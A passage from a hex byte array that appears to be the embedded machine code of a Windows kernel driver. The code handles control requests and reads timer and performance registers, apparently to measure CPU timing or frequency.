0x8B, 0xC7, 0x8B, 0xD7, 0x8B, 0x9C, 0x24, 0x30, 0x03, 0x00, 0x00, 0x8B, 0xCB, 0xE8, 0xAA, 0xE4, 0xFF, 0xFF, 0x4C, 0x8D, 0x9C, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x5C, 0x24, 0x20, 0x44, 0x8B, 0x8C, 0x24, 0x40, 0x03, 0x00, 0x00, 0x45, 0x8B, 0xC7, 0x8B, 0xD7, 0x8B, 0xCB, 0xE8, 0x49, 0xE4, 0xFF, 0xFF, 0x48, 0x8B, 0x8C, 0x24, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xC1, 0x48, 0x25, 0x00, 0x00, 0x00, 0xB0, 0x48, 0x3D, 0x00, 0x00, 0x00, 0x10, 0x74, 0x0D, 0x41, 0xFF, 0xCC, 0x44, 0x89, 0x64, 0x24, 0x38, 0xE9, 0x56, 0xFF, 0xFF, 0xFF, 0x89, 0x74, 0x24, 0x38, 0x85, 0xF6, 0x78, 0x3F, 0x48, 0x8D, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x44, 0x8B, 0x8C, 0x24, 0x40, 0x03, 0x00, 0x00, 0x45, 0x8B, 0xC7, 0x8B, 0xD7, 0x8B, 0xCB, 0xE8, 0xFA, 0xE3, 0xFF, 0xFF, 0x48, 0x8B, 0x8C, 0x24, 0x88, 0x00, 0x00, 0x00, 0x0F, 0xBA, 0xE1, 0x1C, 0x72, 0x08, 0xF7, 0xC1, 0x00, 0x00, 0x00, 0xA0, 0x75, 0x08, 0xFF, 0xCE, 0x89, 0x74, 0x24, 0x38, 0xEB, 0xBD, 0x8B, 0xC1, 0x25, 0x00, 0x00, 0x00, 0xA0, 0x3D, 0x00, 0x00, 0x00, 0x80, 0x75, 0x0B, 0x0F, 0xB6, 0xC1, 0x41, 0xB9, 0x01, 0x00, 0x00, 0x00, 0xEB, 0x08, 0xB8, 0xFF, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x45, 0x89, 0x4D, 0x00, 0x41, 0x89, 0x45, 0x04, 0x48, 0x8B, 0xC1, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x08, 0x41, 0x89, 0x4D, 0x0C, 0x49, 0xC7, 0x46, 0x38, 0x10, 0x00, 0x00, 0x00, 0x41, 0xC7, 0x46, 0x30, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xF8, 0x13, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xE7, 0x13, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x10, 0x0F, 0x82, 0xF6, 0x00, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x0C, 0x0F, 0x82, 0xEC, 0x00, 0x00, 0x00, 0x45, 0x8B, 0x55, 0x00, 0x44, 0x89, 0x94, 0x24, 0x30, 0x03, 0x00, 0x00, 0x41, 0x0F, 0xB6, 0x45, 0x08, 0x45, 0x8B, 0xCF, 0x41, 0x0F, 0xB6, 0x4D, 0x04, 0x02, 0xC9, 0x80, 0xC9, 0x01, 0x41, 0x8D, 0x52, 0x03, 0xEE, 0x41, 0x8D, 0x52, 0x02, 0x0F, 0xB6, 0xC1, 0xEE, 0x41, 0x0F, 0xB7, 0xD2, 0xB0, 0x07, 0xEE, 0x41, 0x8D, 0x52, 0x01, 0xEC, 0x44, 0x0F, 0xB6, 0xC0, 0x88, 0x44, 0x24, 0x31, 0xBE, 0xE8, 0x03, 0x00, 0x00, 0x89, 0xB4, 0x24, 0x44, 0x01, 0x00, 0x00, 0x90, 0x41, 0x0F, 0xB6, 0xC8, 0xF7, 0xD1, 0x84, 0xC9, 0x79, 0x55, 0x41, 0x8B, 0xCF, 0x89, 0x8C, 0x24, 0x1C, 0x01, 0x00, 0x00, 0x41, 0x8B, 0xC7, 0x89, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x66, 0x90, 0x3D, 0x20, 0x4E, 0x00, 0x00, 0x73, 0x14, 0xFF, 0xC1, 0x89, 0x8C, 0x24, 0x1C, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xEB, 0xE5, 0x41, 0x8D, 0x52, 0x01, 0xEC, 0x44, 0x8A, 0xC0, 0x88, 0x44, 0x24, 0x31, 0x83, 0xEE, 0x01, 0x89, 0xB4, 0x24, 0x44, 0x01, 0x00, 0x00, 0x78, 0x02, 0xEB, 0xAB, 0x0F, 0xB6, 0x84, 0x24, 0x38, 0x03, 0x00, 0x00, 0xEB, 0x0B, 0x41, 0x8D, 0x52, 0x04, 0xEC, 0x41, 0xB9, 0x01, 0x00, 0x00, 0x00, 0x45, 0x89, 0x4D, 0x00, 0x0F, 0xB6, 0xC0, 0x41, 0x89, 0x45, 0x04, 0x41, 0x0F, 0xB6, 0xC0, 0x41, 0x89, 0x45, 0x08, 0x41, 0x89, 0x75, 0x0C, 0x49, 0xC7, 0x46, 0x38, 0x10, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xE7, 0x12, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xD6, 0x12, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x10, 0x0F, 0x82, 0x8F, 0x00, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x10, 0x0F, 0x82, 0x85, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x00, 0x89, 0x84, 0x24, 0xC8, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x04, 0x89, 0x84, 0x24, 0xCC, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x08, 0x89, 0x84, 0x24, 0xD0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x0C, 0x89, 0x84, 0x24, 0xD4, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xC8, 0x00, 0x00, 0x00, 0xE8, 0xB2, 0x15, 0x00, 0x00, 0x44, 0x8B, 0x9C, 0x24, 0xC8, 0x00, 0x00, 0x00, 0x45, 0x89, 0x5D, 0x00, 0x8B, 0x84, 0x24, 0xCC, 0x00, 0x00, 0x00, 0x41, 0x89, 0x45, 0x04, 0x8B, 0x84, 0x24, 0xD0, 0x00, 0x00, 0x00, 0x41, 0x89, 0x45, 0x08, 0x8B, 0x84, 0x24, 0xD4, 0x00, 0x00, 0x00, 0x41, 0x89, 0x45, 0x0C, 0x49, 0xC7, 0x46, 0x38, 0x10, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x3D, 0x12, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x2C, 0x12, 0x00, 0x00, 0x05, 0xFC, 0xDA, 0xBF, 0x63, 0x83, 0xF8, 0x24, 0x0F, 0x87, 0x16, 0x12, 0x00, 0x00, 0x48, 0x8D, 0x3D, 0xB0, 0xCF, 0xFF, 0xFF, 0x0F, 0xB6, 0x84, 0x07, 0xDC, 0x43, 0x00, 0x00, 0x8B, 0x8C, 0x87, 0xB4, 0x43, 0x00, 0x00, 0x48, 0x03, 0xCF, 0xFF, 0xE1, 0x83, 0x7A, 0x08, 0x10, 0x0F, 0x82, 0xF6, 0x01, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x04, 0x0F, 0x82, 0xEC, 0x01, 0x00, 0x00, 0x44, 0x89, 0xBC, 0x24, 0xE4, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x00, 0x89, 0x84, 0x24, 0xE0, 0x00, 0x00, 0x00, 0x05, 0x00, 0x03, 0x00, 0x00, 0x89, 0x84, 0x24, 0xE0, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC0, 0xBA, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0xE0, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x1B, 0x20, 0x00, 0x00, 0x4C, 0x8B, 0xE0, 0x8B, 0x48, 0x20, 0x89, 0x8C, 0x24, 0x40, 0x03, 0x00, 0x00, 0x89, 0x8C, 0x24, 0x48, 0x02, 0x00, 0x00, 0x8B, 0x80, 0xE0, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0x48, 0x03, 0x00, 0x00, 0x89, 0x84, 0x24, 0x4C, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0x50, 0x02, 0x00, 0x00, 0x0F, 0xBA, 0xF1, 0x11, 0x41, 0x89, 0x4C, 0x24, 0x20, 0x41, 0xC7, 0x84, 0x24, 0xE0, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0xB4, 0x24, 0x80, 0x00, 0x00, 0x00, 0x45, 0x8B, 0xBC, 0x24, 0x90, 0x00, 0x00, 0x00, 0x44, 0x89, 0xBC, 0x24, 0x4C, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xD8, 0x01, 0x00, 0x00, 0xFF, 0x15, 0xED, 0x1E, 0x00, 0x00, 0x48, 0x8B, 0xD8, 0x48, 0x8B, 0x84, 0x24, 0xD8, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x80, 0x48, 0xB8, 0xCF, 0xF7, 0x53, 0xE3, 0xA5, 0x9B, 0xC4, 0x20, 0x48, 0xF7, 0xE9, 0x48, 0x8B, 0xFA, 0x48, 0xC1, 0xFF, 0x07, 0x48, 0x8B, 0xC7, 0x48, 0xC1, 0xE8, 0x3F, 0x48, 0x03, 0xF8, 0xB8, 0x00, 0x00, 0xF0, 0xFF, 0x0F, 0x1F, 0x00, 0x41, 0x8B, 0x8C, 0x24, 0x90, 0x00, 0x00, 0x00, 0x89, 0x8C, 0x24, 0x30, 0x03, 0x00, 0x00, 0x3B, 0xC8, 0x73, 0x2B, 0x41, 0x89, 0xB4, 0x24, 0x80, 0x00, 0x00, 0x00, 0x45, 0x8B, 0xBC, 0x24, 0x90, 0x00, 0x00, 0x00, 0x44, 0x89, 0xBC, 0x24, 0x4C, 0x01, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0x85, 0x1E, 0x00, 0x00, 0x48, 0x8B, 0xD8, 0x44, 0x89, 0xBC, 0x24, 0x30, 0x03, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0x72, 0x1E, 0x00, 0x00, 0x4C, 0x8B, 0xD8, 0x48, 0x2B, 0xC3, 0x48, 0x3B, 0xC7, 0xB8, 0x00, 0x00, 0xF0, 0xFF, 0x7C, 0xAA, 0x4C, 0x2B, 0xDB, 0x4D, 0x85, 0xDB, 0x7E, 0x2A, 0x44, 0x2B, 0xBC, 0x24, 0x30, 0x03, 0x00, 0x00, 0x41, 0x8B, 0xC7, 0x48, 0x0F, 0xAF, 0x84, 0x24, 0xD8, 0x01, 0x00, 0x00, 0x48, 0xC1, 0xE0, 0x03, 0x48, 0x99, 0x49, 0xF7, 0xFB, 0x48, 0x8B, 0xD8, 0x48, 0x89, 0x84, 0x24, 0x98, 0x01, 0x00, 0x00, 0xEB, 0x0A, 0x33, 0xDB, 0x48, 0x89, 0x9C, 0x24, 0x98, 0x01, 0x00, 0x00, 0x8B, 0x84, 0x24, 0x40, 0x03, 0x00, 0x00, 0x41, 0x89, 0x44, 0x24, 0x20, 0x8B, 0xBC, 0x24, 0x48, 0x03, 0x00, 0x00, 0x41, 0x89, 0xBC, 0x24, 0xE0, 0x00, 0x00, 0x00, 0x8B, 0xB4, 0x24, 0x80, 0x00, 0x00, 0x00, 0x41, 0x89, 0xB4, 0x24, 0x80, 0x00, 0x00, 0x00, 0xBA, 0x00, 0x01, 0x00, 0x00, 0x49, 0x8B, 0xCC, 0xFF, 0x15, 0x1E, 0x1E, 0x00, 0x00, 0x41, 0x89, 0x5D, 0x00, 0x8B, 0x84, 0x24, 0x9C, 0x01, 0x00, 0x00, 0x41, 0x89, 0x45, 0x04, 0x41, 0x89, 0x7D, 0x08, 0x41, 0x89, 0x75, 0x0C, 0x49, 0xC7, 0x46, 0x38, 0x10, 0x00, 0x00, 0x00, 0x41, 0xC7, 0x46, 0x30, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x03, 0x10, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xF2, 0x0F, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x10, 0x0F, 0x82, 0xA5, 0x02, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x04, 0x0F, 0x82, 0x9B, 0x02, 0x00, 0x00, 0x44, 0x89, 0xBC, 0x24, 0xF0, 0x00, 0x00, 0x00, 0x44, 0x89, 0x7C, 0x24, 0x78, 0x44, 0x89, 0x7C, 0x24, 0x64, 0x45, 0x33, 0xC9, 0x4C, 0x8D, 0x84, 0x24, 0xF0, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x78, 0x48, 0x8D, 0x4C, 0x24, 0x64, 0xFF, 0x15, 0xCA, 0x1D, 0x00, 0x00, 0x41, 0x8B, 0x7D, 0x00, 0x89, 0xBC, 0x24, 0x08, 0x02, 0x00, 0x00, 0xB9, 0x32, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x44, 0x8B, 0xE0, 0x4C, 0x89, 0xA4, 0x24, 0x88, 0x02, 0x00, 0x00, 0xB9, 0x3E, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x8B, 0xC0, 0x48, 0x89, 0x84, 0x24, 0x90, 0x02, 0x00, 0x00, 0xB9, 0x38, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x8B, 0xC0, 0x48, 0x89, 0x84, 0x24, 0x98, 0x02, 0x00, 0x00, 0xB9, 0x32, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x44, 0x8B, 0xC0, 0x49, 0x0F, 0xBA, 0xF0, 0x11, 0x49, 0x8B, 0xD0, 0x48, 0xC1, 0xEA, 0x20, 0x41, 0x8B, 0xC0, 0x0F, 0x30, 0xBA, 0x02, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x3E, 0x08, 0x00, 0x00, 0xB8, 0x02, 0x00, 0x00, 0x00, 0x0F, 0x30, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x48, 0x8B, 0xD6, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x38, 0x08, 0x00, 0x00, 0x8B, 0xC6, 0x0F, 0x30, 0xB9, 0x39, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x44, 0x8B, 0xD0, 0x4C, 0x89, 0x94, 0x24, 0x78, 0x01, 0x00, 0x00, 0x0F, 0xB7, 0xD7, 0xED, 0x44, 0x8B, 0xC0, 0x89, 0x44, 0x24, 0x68, 0x41, 0x81, 0xE0, 0xFF, 0xFF, 0xFF, 0x00, 0x44, 0x89, 0x44, 0x24, 0x68, 0x45, 0x8B, 0xDF, 0x44, 0x89, 0xBC, 0x24, 0x00, 0x01, 0x00, 0x00, 0x41, 0x8B, 0xDF, 0x89, 0x9C, 0x24, 0x70, 0x01, 0x00, 0x00, 0x41, 0xBF, 0x00, 0x00, 0xF0, 0xFF, 0xB9, 0x39, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x44, 0x8B, 0xC8, 0x4D, 0x3B, 0xCF, 0x73, 0x4C, 0x48, 0x8B, 0xD6, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x38, 0x08, 0x00, 0x00, 0x8B, 0xC6, 0x0F, 0x30, 0xB9, 0x39, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x44, 0x8B, 0xD0, 0x4C, 0x89, 0x94, 0x24, 0x78, 0x01, 0x00, 0x00, 0x0F, 0xB7, 0xD7, 0xED, 0x44, 0x8B, 0xC0, 0x89, 0x44, 0x24, 0x68, 0x41, 0x81, 0xE0, 0xFF, 0xFF, 0xFF, 0x00, 0x44, 0x89, 0x44, 0x24, 0x68, 0x4D, 0x8B, 0xCA, 0xFF, 0xC3, 0x89, 0x9C, 0x24, 0x70, 0x01, 0x00, 0x00, 0x0F, 0xB7, 0xD7, 0xED, 0x8B, 0xC8, 0x89, 0x84, 0x24, 0x9C, 0x00, 0x00, 0x00, 0x81, 0xE1, 0xFF, 0xFF, 0xFF, 0x00, 0x89, 0x8C, 0x24, 0x9C, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xC8, 0x73, 0x0D, 0x81, 0xC1, 0xFF, 0xFF, 0xFF, 0x00, 0x89, 0x8C, 0x24, 0x9C, 0x00, 0x00, 0x00, 0x41, 0xFF, 0xC3, 0x44, 0x89, 0x9C, 0x24, 0x00, 0x01, 0x00, 0x00, 0x8B, 0xC1, 0x41, 0x2B, 0xC0, 0x3D, 0x98, 0x3A, 0x00, 0x00, 0x0F, 0x82, 0x57, 0xFF, 0xFF, 0xFF, 0x66, 0x0F, 0xEF, 0xD2, 0xF2, 0x49, 0x0F, 0x2A, 0xD2, 0x4D, 0x85, 0xD2, 0x79, 0x0E, 0xF2, 0x0F, 0x10, 0x05, 0xE8, 0x1C, 0x00, 0x00, 0xF2, 0x0F, 0x58, 0xD0, 0xEB, 0x08, 0xF2, 0x0F, 0x10, 0x05, 0xDA, 0x1C, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xC9, 0xF2, 0x49, 0x0F, 0x2A, 0xC9, 0x4D, 0x85, 0xC9, 0x79, 0x04, 0xF2, 0x0F, 0x58, 0xC8, 0xF2, 0x0F, 0x5C, 0xD1, 0x8B, 0xD1, 0x66, 0x0F, 0xEF, 0xC9, 0xF2, 0x48, 0x0F, 0x2A, 0xCA, 0x41, 0x8B, 0xD0, 0x66, 0x0F, 0xEF, 0xC0, 0xF2, 0x48, 0x0F, 0x2A, 0xC2, 0xF2, 0x0F, 0x5C, 0xC8, 0xF2, 0x0F, 0x59, 0x15, 0xA9, 0x1C, 0x00, 0x00, 0xF2, 0x0F, 0x5E, 0xD1, 0xF2, 0x0F, 0x5A, 0xC2, 0x49, 0x8B, 0xD4, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x32, 0x08, 0x00, 0x00, 0x41, 0x8B, 0xC4, 0x0F, 0x30, 0x48, 0x8B, 0x84, 0x24, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8B, 0xD0, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x3E, 0x08, 0x00, 0x00, 0x0F, 0x30, 0x48, 0x8B, 0x84, 0x24, 0x98, 0x02, 0x00, 0x00, 0x48, 0x8B, 0xD0, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x38, 0x08, 0x00, 0x00, 0x0F, 0x30, 0xF3, 0x48, 0x0F, 0x2C, 0xC0, 0x41, 0x89, 0x45, 0x00, 0x41, 0x89, 0x5D, 0x04, 0x45, 0x89, 0x5D, 0x08, 0x45, 0x89, 0x55, 0x0C, 0x49, 0xC7, 0x46, 0x38, 0x10, 0x00, 0x00, 0x00, 0x41, 0xC7, 0x46, 0x30, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x43, 0x0D, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x32, 0x0D, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x10, 0x73, 0x11, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x1B, 0x0D, 0x00, 0x00, 0xB9, 0x32, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x8B, 0xC0, 0x48, 0x89, 0x84, 0x24, 0x68, 0x02, 0x00, 0x00, 0xB9, 0x3E, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x8B, 0xC0, 0x48, 0x89, 0x84, 0x24, 0x70, 0x02, 0x00, 0x00, 0xB9, 0x38, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x8B, 0xC0, 0x48, 0x89, 0x84, 0x24, 0x78, 0x02, 0x00, 0x00, 0xB9, 0x32, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x44, 0x8B, 0xC0, 0x49, 0x0F, 0xBA, 0xF0, 0x11, 0x49, 0x8B, 0xD0, 0x48, 0xC1, 0xEA, 0x20, 0x41, 0x8B, 0xC0, 0x0F, 0x30, 0xBA, 0x02, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x3E, 0x08, 0x00, 0x00, 0xB8, 0x02, 0x00, 0x00, 0x00, 0x0F, 0x30, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x48, 0x8B, 0xD6, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x38, 0x08, 0x00, 0x00, 0x8B, 0xC6, 0x0F, 0x30, 0xB9, 0x39, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x44, 0x8B, 0xE0, 0x4C, 0x89, 0xA4, 0x24, 0x20, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x01, 0x00, 0x00, 0xFF, 0x15, 0x11, 0x1A, 0x00, 0x00, 0x48, 0x8B, 0xD8, 0x48, 0x8B, 0x84, 0x24, 0xA0, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x80, 0x48, 0xB8, 0xCF, 0xF7, 0x53, 0xE3, 0xA5, 0x9B, 0xC4, 0x20, 0x48, 0xF7, 0xE9, 0x48, 0x8B, 0xFA, 0x48, 0xC1, 0xFF, 0x07, 0x48, 0x8B, 0xC7, 0x48, 0xC1, 0xE8, 0x3F, 0x48, 0x03, 0xF8, 0x41, 0xBF, 0x00, 0x00, 0xF0, 0xFF, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0xB9, 0x39, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x8B, 0xC0, 0x48, 0x89, 0x84, 0x24, 0x30, 0x03, 0x00, 0x00, 0x49, 0x3B, 0xC7, 0x73, 0x3C, 0x48, 0x8B, 0xD6, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x38, 0x08, 0x00, 0x00, 0x8B, 0xC6, 0x0F, 0x30, 0xB9, 0x39, 0x08, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x44, 0x8B, 0xE0, 0x4C, 0x89, 0xA4, 0x24, 0x20, 0x02, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0x8A, 0x19, 0x00, 0x00, 0x48, 0x8B, 0xD8, 0x4C, 0x89, 0xA4, 0x24, 0x30, 0x03, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0x77, 0x19, 0x00, 0x00, 0x4C, 0x8B, 0xD8, 0x48, 0x2B, 0xC3, 0x48, 0x3B, 0xC7, 0x7C, 0x94, 0x4C, 0x2B, 0xDB, 0x4D, 0x85, 0xDB, 0x7E, 0x22, 0x4C, 0x2B, 0xA4, 0x24, 0x30, 0x03, 0x00, 0x00, 0x4C, 0x0F, 0xAF, 0xA4, 0x24, 0xA0, 0x01, 0x00, 0x00, 0x49, 0xC1, 0xE4, 0x03, 0x33, 0xD2, 0x49, 0x8B, 0xC4, 0x49, 0xF7, 0xF3, 0x4C, 0x8B, 0xC0, 0xEB, 0x0B, 0x45, 0x33, 0xC0, 0x4C, 0x89, 0x84, 0x24, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x68, 0x02, 0x00, 0x00, 0x48, 0x8B, 0xD0, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x32, 0x08, 0x00, 0x00, 0x0F, 0x30, 0x4C, 0x8B, 0x8C, 0x24, 0x70, 0x02, 0x00, 0x00, 0x49, 0x8B, 0xD1, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x3E, 0x08, 0x00, 0x00, 0x41, 0x8B, 0xC1, 0x0F, 0x30, 0x4C, 0x8B, 0x94, 0x24, 0x78, 0x02, 0x00, 0x00, 0x49, 0x8B, 0xD2, 0x48, 0xC1, 0xEA, 0x20, 0xB9, 0x38, 0x08, 0x00, 0x00, 0x41, 0x8B, 0xC2, 0x0F, 0x30, 0x45, 0x89, 0x45, 0x00, 0x49, 0xC1, 0xE8, 0x20, 0x45, 0x89, 0x45, 0x04, 0x45, 0x89, 0x4D, 0x08, 0x45, 0x89, 0x55, 0x0C, 0x49, 0xC7, 0x46, 0x38, 0x10, 0x00, 0x00, 0x00, 0x41, 0xC7, 0x46, 0x30, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x07, 0x0B, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x73, 0x11, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xF0, 0x0A, 0x00, 0x00, 0xB9, 0xE8, 0x00, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x4C, 0x8B, 0xE0, 0xB9, 0xE7, 0x00, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x48, 0x8B, 0xF0, 0x48, 0x8D, 0x8C, 0x24, 0x88, 0x01, 0x00, 0x00, 0xFF, 0x15, 0x71, 0x18, 0x00, 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x8B, 0x8C, 0x24, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x14, 0x89, 0x48, 0xB8, 0xCF, 0xF7, 0x53, 0xE3, 0xA5, 0x9B, 0xC4, 0x20, 0x48, 0xF7, 0xEA, 0x48, 0x8B, 0xDA, 0x48, 0xC1, 0xFB, 0x07, 0x48, 0x8B, 0xD3, 0x48, 0xC1, 0xEA, 0x3F, 0x48, 0x03, 0xDA, 0x33, 0xC9, 0xFF, 0x15, 0x3C, 0x18, 0x00, 0x00, 0x48, 0x2B, 0xC7, 0x48, 0x3B, 0xC3, 0x7C, 0xF0, 0xB9, 0xE8, 0x00, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x48, 0x8B, 0xD8, 0xB9, 0xE7, 0x00, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x48, 0x8B, 0xF8, 0x33, 0xC9, 0xFF, 0x15, 0x0A, 0x18, 0x00, 0x00, 0x49, 0x2B, 0xDC, 0x66, 0x0F, 0xEF, 0xD2, 0xF2, 0x48, 0x0F, 0x2A, 0xD3, 0x79, 0x0E, 0xF2, 0x0F, 0x10, 0x05, 0x24, 0x19, 0x00, 0x00, 0xF2, 0x0F, 0x58, 0xD0, 0xEB, 0x08, 0xF2, 0x0F, 0x10, 0x05, 0x16, 0x19, 0x00, 0x00, 0x48, 0x2B, 0xFE, 0x66, 0x0F, 0xEF, 0xC9, 0xF2, 0x48, 0x0F, 0x2A, 0xCF, 0x79, 0x04, 0xF2, 0x0F, 0x58, 0xC8, 0x66, 0x0F, 0x28, 0xC1, 0x66, 0x0F, 0x54, 0x05, 0xE0, 0x18, 0x00, 0x00, 